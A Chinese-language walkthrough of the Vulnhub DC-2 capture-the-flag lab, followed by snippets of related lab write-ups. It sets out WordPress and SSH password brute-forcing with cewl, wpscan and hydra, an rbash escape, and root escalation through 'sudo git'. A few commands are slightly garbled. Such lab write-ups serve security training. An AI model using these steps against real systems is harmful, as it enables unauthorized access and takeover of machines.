dc-2 靶機實戰
啟動dc-2
配置其網路為nat,檢視其mac 位址,重啟dc-2 使其網路配置生效
使用nmap 掃瞄內網網段
得到dc-2 的ip位址192.168.1.162
對其進行資訊收集
訪問其ip ,連線失敗
新增本地dns解析
再訪問該**,解析成功
cewl 工具
cewl dc-2 >pwd.dic
**目錄掃瞄
使用msf 進行**目錄掃瞄
wpscan工具
wpscan --update
apt-get install wpscan wpscan 更新
注:如果wpscan 無法使用,可以嘗試更換新的kali 虛擬機器,筆者就碰到類似的問題,安裝 kali 2020.2 之後,wpscan 啟動成功
wpscan 爆破使用者
wpscan --url dc-2 -u user.dic -p pwd.dic
flag2
192.168.1.162/wp-admin
使用jerry使用者並用我們爆破出來的密碼嘗試登入
找到flag2
他告訴我們需要另闢蹊徑,我們想到了剛開始使用nmap 掃瞄時,還掃出了ssh 埠7744
hydra 爆破ssh
hydra -l user.dic -p pwd.dic ssh: -s 7744 -o hydra.ssh -vv
檢視結果:
嘗試使用ssh 登入
ssh [email protected] -p 7744
檢視當前目錄檔案
lscat flag3.txt
發現有rbash 命令限制
flag3
繞過限制
bash_cmds[a]=/bin/sh;a
/bin/bash
export path=$path:/bin/
export path=$path:/usr/bin
flag4
切換使用者
切換jerry使用者
su jerry
輸入密碼,登入成功
我們進入到jerry 使用者的家目錄
執行命令,發現沒有許可權
final-flag
提權檢視具有root許可權的命令
sudo -l
發現git 命令具有root 許可權,但是不需要提供給root 密碼
git 提權
sudo git -p --help
強制進入互動式狀態,讓頁面緩衝區無法顯示全部資訊
!/bin/bash
Vulnhub靶機實戰 DC 2
描述 靶機dc 2共有5個flag,最終需要root許可權 才可以找到並檢視flag 環境 vmware虛擬機器軟體 1.檢視ip nmap sp 192.168.1.0 24 檢視ip nmap a 192.168.1.146 這裡我的靶機ip是146 2.瀏覽器訪問 發現無法正常訪問頁面,但在u...
Vulnhub靶機實戰(二) DC 2
開始拿flag 肯定是要先掃瞄ip了,依舊是使用nmap 只掃瞄到了80埠,瀏覽器開啟頁面來進一步收集資訊,頁面上已經說明了這是乙個wordpress站點。直接可以得到乙個flag 找不到有用資訊了,用wpscan掃瞄一下吧簡要介紹一下,wpscan是一款針對wordpress的安全掃瞄軟體 wps...
滲透練習 DC 1靶機
復現slr大哥的dc 1 靶機 dc 1 安裝 直接用瀏覽器訪問剩下的兩個ip,發現有乙個介面如上圖,即為dc 1 的ip。漏洞檢測 在msfconsole中查詢並嘗試針對drupal的工具。因為從初始介面的 powered by drupal 可以知道這個網頁是基於drupal 的cms框架。所以...